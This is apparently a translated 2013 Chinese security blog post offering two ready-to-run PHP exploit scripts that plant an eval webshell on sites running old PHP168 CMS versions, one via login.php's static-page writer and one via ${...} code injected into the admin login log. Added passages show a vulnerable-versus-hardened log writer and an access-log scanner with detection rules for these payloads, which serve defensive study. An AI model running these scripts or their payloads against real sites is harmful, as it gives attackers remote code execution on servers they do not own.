
PHP168 GetShell 0day


I've been really busy lately and haven't found time to update the blog; my apologies to everyone. Over the last couple of days I was doing a penetration test on a project and came across php168, the predecessor of today's 齐博CMS article system. I had a look at php168's vulnerabilities and put together two exploits to share; take them if you like them, and ignore them if you don't.

PHP168 versions below 6.0: GetShell

An attacker can send a crafted request to the user login page and have a PHP one-liner written into the cache directory, obtaining webshell access on any site running the full PHP168 package. The exploit below uses login.php's static-page generation (makehtml=1): chdb[htmlname] names the file, chdb[path] picks the directory and content supplies the file body, and all three come straight from the request, so the page writes attacker-controlled PHP to an attacker-chosen location.

<?php
/**
 * Created by 独自等待
 * Date: 13-11-19
 * Time: 11:26 AM
 * Name: php168_getshell.php
 * 独自等待's blog: http://www.waitalone.cn/
 */
print_r('
+------------------------------------------------------+
             PHP168 login.php GetShell EXP
             Site:http://www.waitalone.cn/
                Exploit BY: 独自等待
                  Time:2013-11-19
+------------------------------------------------------+
');
if ($argc < 3) {
    print_r('
+------------------------------------------------------+
Usage: php ' . $argv[0] . ' host path
Host: target server (ip/hostname)
Path: path of login.php
Example: php ' . $argv[0] . ' localhost /php168
+------------------------------------------------------+
    ');
    exit;
}
error_reporting(7);
$host = $argv[1];
$path = rtrim('/' . ltrim($argv[2], '/'), '/'); // normalise to "/php168" (empty string for the web root)
$shell = 'safe.php';                              // file name that will be written into cache/
$code = '<?php%20@eval($_POST[safe])?>';          // the one-liner, space already URL-encoded
$url = "http://$host$path/cache/$shell";
echo 'Getting shell, please wait...' . "\n\n";
send_pack();
shell_ok($url);
// Check whether the shell was written: the file exists if its URL answers 200.
function shell_ok($url)
{
    $headers = @get_headers($url);
    if ($headers && preg_match('#^HTTP/\d\.\d 200#', $headers[0])) {
        echo 'Congratulations, the one-liner was written. Password: safe' . "\n\n" . 'Shell URL: ' . $url . "\n";
    } else {
        echo 'Shell write failed, try another directory.' . "\n";
    }

}

// Send the request: login.php?makehtml=1 builds a static page named chdb[htmlname]
// in directory chdb[path], with the body taken verbatim from the content parameter.
function send_pack()
{
    global $host, $path, $shell, $code;
    $data = "GET " . $path . "/login.php?makehtml=1&chdb[htmlname]=$shell&chdb[path]=cache&content=$code HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "User-Agent: BaiduSpider\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $fp = @fsockopen($host, 80, $errno, $errstr, 30);
    //echo ini_get('default_socket_timeout'); // default socket timeout is 60 seconds
    if (!$fp) {
        echo $errno . '-->' . $errstr . "\n";
        exit('Could not connect to: ' . $host);
    } else {
        fwrite($fp, $data);
        $back = '';
        while (!feof($fp)) {
            $back .= fread($fp, 1024);
        }
        fclose($fp);
    }
    return $back;
}

?>

Reference: http://huaidan.org/archives/3276.html

PHP168 versions below 4.0: code execution, GetShell possible

This one works on fairly old versions. When someone logs in, php168 saves the login details to cache/adminlogin_logs.php, and the saved values are placed inside a double-quoted string. PHP interpolates variables inside double quotes, including the ${expr} form, so a login attempt whose password field is ${@file_put_contents($_GET[f],$_GET[s])} gets that expression stored in the log file. Requesting cache/adminlogin_logs.php directly with ?f=<filename>&s=<contents> then makes PHP evaluate it and write an arbitrary file, which is how the exp below drops the one-liner as cache/config.php. See the exp below for the details.
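To make the mechanism concrete, here is an added example (my own code, not PHP168's and not from the original post) that rebuilds the pattern in miniature: a log writer that drops the submitted fields into a .php file inside a double-quoted string, a hardened writer that uses var_export(), and a harness that includes the generated file with f= and s= set, as the exploit does over HTTP, and checks whether the payload created a file. The function names, log entry format, sample credentials and scratch paths are assumptions. It needs PHP 8 (bare f and s array keys are no longer accepted as strings there, so the payload below quotes them), and on 8.2+ the ${expr} syntax raises a deprecation notice but still runs.

```php
<?php
// Added example, not PHP168's own code: a minimal reconstruction of the logging
// pattern described above (user input written into a .php file inside a
// double-quoted string), next to a hardened version. Function names, the log
// entry format and the sample credentials are assumptions made for the demo.

// Vulnerable pattern: the submitted fields are concatenated into PHP source
// between double quotes. PHP evaluates ${expr} (and {$var}) inside such a
// string, so the "password" is executed the next time the file is parsed.
function vulnerable_log_entry(string $loginname, string $loginpwd): string
{
    return '<?php $adminlogin_logs[] = "' . date('Y-m-d H:i:s')
        . ' loginname=' . $loginname . '&loginpwd=' . $loginpwd . '";' . "\n";
}

// Hardened pattern: var_export() emits single-quoted strings with quotes and
// backslashes escaped, so the input can only ever be parsed as data. Keeping
// the log outside the web root, and not as .php at all, is better still.
function hardened_log_entry(string $loginname, string $loginpwd): string
{
    $record = ['time' => date('Y-m-d H:i:s'), 'loginname' => $loginname, 'loginpwd' => $loginpwd];
    return '<?php $adminlogin_logs[] = ' . var_export($record, true) . ';' . "\n";
}

// Write a generated log file to a scratch directory, parse it the way a direct
// request would (here: include it with f= and s= set), and report whether the
// payload's side effect, a new file next to the log, occurred.
function payload_fires(string $php_source): bool
{
    $dir    = sys_get_temp_dir() . '/php168_demo_' . bin2hex(random_bytes(4));
    mkdir($dir);
    $log    = $dir . '/adminlogin_logs.php';
    $target = $dir . '/config.php';
    file_put_contents($log, $php_source);

    $_GET['f'] = $target;   // stands in for ?f=config.php
    $_GET['s'] = 'marker';  // stands in for &s=<one-liner>
    @include $log;          // @: the payload leaves an undefined-variable warning behind

    $fired = file_exists($target);
    @unlink($target);
    unlink($log);
    rmdir($dir);
    return $fired;
}

// The post's payload with quoted array keys: PHP 8 no longer accepts the bare
// f and s of the original as strings. PHP 8.2+ prints a deprecation notice for
// ${expr} interpolation but still evaluates it.
$payload = '${@file_put_contents($_GET[\'f\'],$_GET[\'s\'])}';

printf("vulnerable entry executes payload: %s\n", payload_fires(vulnerable_log_entry('admin', $payload)) ? 'yes' : 'no');
printf("hardened entry executes payload:   %s\n", payload_fires(hardened_log_entry('admin', $payload)) ? 'yes' : 'no');
```

Run it with the PHP CLI: the vulnerable entry creates config.php in the scratch directory and the hardened one does not, because var_export() turns the same input into a single-quoted literal that PHP never interpolates. The fix is not escaping the quote characters by hand; it is never letting untrusted bytes land inside a double-quoted PHP string literal (or, preferably, never writing them into a file PHP will execute).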

<?php
/**
 * Created by 独自等待
 * Date: 13-11-19
 * Time: 5:46 PM
 * Name: php168_codeexec.php
 * 独自等待's blog: http://www.waitalone.cn/
 */
print_r('
+------------------------------------------------------+
                PHP168 Code_Exec EXP
             Site:http://www.waitalone.cn/
                Exploit BY: 独自等待
                  Time:2013-11-19
+------------------------------------------------------+
');
if ($argc < 3) {
    print_r('
+------------------------------------------------------+
Usage: php ' . $argv[0] . ' host path
Host: target server (ip/hostname)
Path: path of php168
Example: php ' . $argv[0] . ' localhost /php168
+------------------------------------------------------+
    ');
    exit;
}
error_reporting(7);
//set_time_limit(30);
$host = $argv[1];
$path = rtrim('/' . ltrim($argv[2], '/'), '/'); // normalise to "/php168" (empty string for the web root)
// The ${...} lands inside the double-quoted log entry and is evaluated whenever the
// log file is parsed. The bare f and s keys rely on old PHP treating an undefined
// constant as the string of its name.
$exec = 'loginname=admin&loginpwd=${@file_put_contents($_GET[f],$_GET[s])}';
// Only targets that expose the login log at all are worth trying.
if (@fopen("http://$host$path/cache/adminlogin_logs.php", 'r')) {
    echo 'Getting shell, please wait...' . "\n\n";
    send_pack($exec);
    get_shell();
} else {
    exit('This site is not vulnerable.');
}
// Trigger the stored payload: requesting the log file directly with f= and s=
// makes it write the one-liner as cache/config.php.
function get_shell()
{
    global $host, $path;
    $shell_url = "http://$host$path/cache/adminlogin_logs.php?f=config.php&s=" . rawurlencode('<?php @eval($_POST[safe])?>');
    @file_get_contents($shell_url);
    $shell = "http://$host$path/cache/config.php";
    if (@fopen($shell, 'r')) {
        echo 'Congratulations, the one-liner was written. Password: safe' . "\n\n" . 'Shell URL: ' . $shell . "\n";
    } else {
        echo 'Shell write failed, try another path.' . "\n";
    }
}

// Send the login attempt whose password field carries the payload.
function send_pack($code)
{
    global $host, $path;
    $data = "POST " . $path . "/admin/index.php HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "User-Agent: BaiduSpider\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: " . strlen($code) . "\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $data .= $code;
    //echo $data;exit;
    $fp = @fsockopen($host, 80, $errno, $errstr, 30);
    //echo ini_get('default_socket_timeout'); // default socket timeout is 60 seconds
    if (!$fp) {
        echo $errno . '-->' . $errstr . "\n";
        exit('Could not connect to: ' . $host);
    } else {
        fwrite($fp, $data);
        $back = '';
        while (!feof($fp)) {
            $back .= fread($fp, 1024);
        }
        fclose($fp);
    }
    return $back;
}

?>
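As an added example covering both exploits above (my own code, not from the original post or from PHP168): a scanner over web-server access logs for the traces the two exploits leave behind. The combined-format log lines, client addresses and rule names are constructed for the demo; only the request shapes come from the exploit code. Note the limit on the second exploit: the POST to admin/index.php carries the payload in its body, which an access log does not record, so detection rests on the follow-up GET to cache/adminlogin_logs.php with f= and s=, and on the fact that PHP scripts under cache/ are being served at all. Requires PHP 8 for str_contains() and str_ends_with().

```php
<?php
// Added example, not from the original post: a small access-log scanner for the
// request patterns the two PHP168 exploits leave behind. Log lines, client
// addresses and rule names are constructed for the demo; only the shape of the
// requests is taken from the exploit code. Requires PHP 8.

// Split a combined-format access log line into the fields the rules need.
function parse_log_line(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    $uri   = $m[4];
    $qpos  = strpos($uri, '?');
    $path  = $qpos === false ? $uri : substr($uri, 0, $qpos);
    $query = $qpos === false ? '' : substr($uri, $qpos + 1);
    parse_str($query, $params);   // decodes chdb[htmlname]=... into a nested array
    return ['client' => $m[1], 'time' => $m[2], 'method' => $m[3], 'path' => $path,
            'params' => $params, 'status' => (int) $m[5], 'ua' => $m[6]];
}

// Apply the rules to one parsed request. Returns a list of [severity, rule, detail].
function classify(array $req): array
{
    $hits = [];
    $path = strtolower($req['path']);
    $p    = $req['params'];
    $chdb = is_array($p['chdb'] ?? null) ? $p['chdb'] : [];

    // Exploit 1: login.php asked to build a static page from attacker-chosen name, directory and body.
    if (str_ends_with($path, '/login.php') && isset($p['makehtml']) && $chdb !== []) {
        $hits[] = ['high', 'php168-login-makehtml-write',
                   sprintf('target %s/%s', $chdb['path'] ?? '?', $chdb['htmlname'] ?? '?')];
    }
    // Exploit 2: the admin login log fetched directly; with f= and s= it is being used as a file writer.
    if (str_ends_with($path, '/cache/adminlogin_logs.php')) {
        $hits[] = [isset($p['f'], $p['s']) ? 'high' : 'medium', 'php168-adminlogin-log-direct-request',
                   isset($p['f']) ? 'writes ' . $p['f'] : 'no write parameters'];
    } elseif (str_contains($path, '/cache/') && str_ends_with($path, '.php')) {
        // Both payloads drop their shell under cache/; a PHP script there should never be served.
        $hits[] = ['medium', 'php-script-served-from-cache', $path];
    }
    // Either exploit: PHP source travelling in a query-string parameter.
    foreach (array_filter($p, 'is_string') as $name => $value) {
        if (stripos($value, '<?php') !== false) {
            $hits[] = ['high', 'php-tag-in-query-parameter', "parameter $name"];
        }
    }
    // Weak signal: a crawler user agent on login/admin paths (both exploits claim to be BaiduSpider).
    if (preg_match('/spider|bot/i', $req['ua'])
        && (str_contains($path, '/login.php') || str_contains($path, '/admin/'))) {
        $hits[] = ['low', 'crawler-ua-on-login-or-admin', $req['ua']];
    }
    return $hits;
}

// Scan a whole log and flatten the findings, one row per (request, rule).
function scan_access_log(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $req = parse_log_line($line);
        if ($req === null) {
            continue;   // unparseable line: skip rather than guess
        }
        foreach (classify($req) as [$severity, $rule, $detail]) {
            $findings[] = ['client' => $req['client'], 'time' => $req['time'],
                           'severity' => $severity, 'rule' => $rule, 'detail' => $detail];
        }
    }
    return $findings;
}

// Constructed sample log (combined format), not a real capture. The third line is the
// exploit's POST: its body is not logged, so it produces no finding on its own.
$sample = <<<'LOG'
203.0.113.5 - - [19/Nov/2013:11:30:01 +0800] "GET /php168/login.php?makehtml=1&chdb[htmlname]=safe.php&chdb[path]=cache&content=<?php%20@eval($_POST[safe])?> HTTP/1.1" 200 512 "-" "BaiduSpider"
203.0.113.5 - - [19/Nov/2013:11:30:02 +0800] "GET /php168/cache/safe.php HTTP/1.1" 200 0 "-" "BaiduSpider"
203.0.113.5 - - [19/Nov/2013:17:50:10 +0800] "POST /php168/admin/index.php HTTP/1.1" 302 0 "-" "BaiduSpider"
203.0.113.5 - - [19/Nov/2013:17:50:11 +0800] "GET /php168/cache/adminlogin_logs.php?f=config.php&s=<?php%20@eval($_POST[safe])?> HTTP/1.1" 200 0 "-" "BaiduSpider"
198.51.100.7 - - [19/Nov/2013:18:00:00 +0800] "GET /php168/index.php HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
LOG;

foreach (scan_access_log($sample) as $f) {
    printf("%-6s %-12s %-38s %s (%s)\n", $f['severity'], $f['client'], $f['rule'], $f['detail'], $f['time']);
}
```

The rules are deliberately narrow: the makehtml write and the f=/s= request on the login log are unambiguous, the PHP tag in a query parameter catches both one-liners regardless of the file name chosen, and the cache/*.php and crawler-UA rules are there only to tie the follow-up shell access back to the same client. Feeding the scanner an IDS-style live stream instead of a file is just a matter of calling parse_log_line() and classify() per line.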

PHP168 0day

Since the PHP168 article system is no longer maintained (it has been renamed 齐博CMS), these two 0days are not of much use any more...
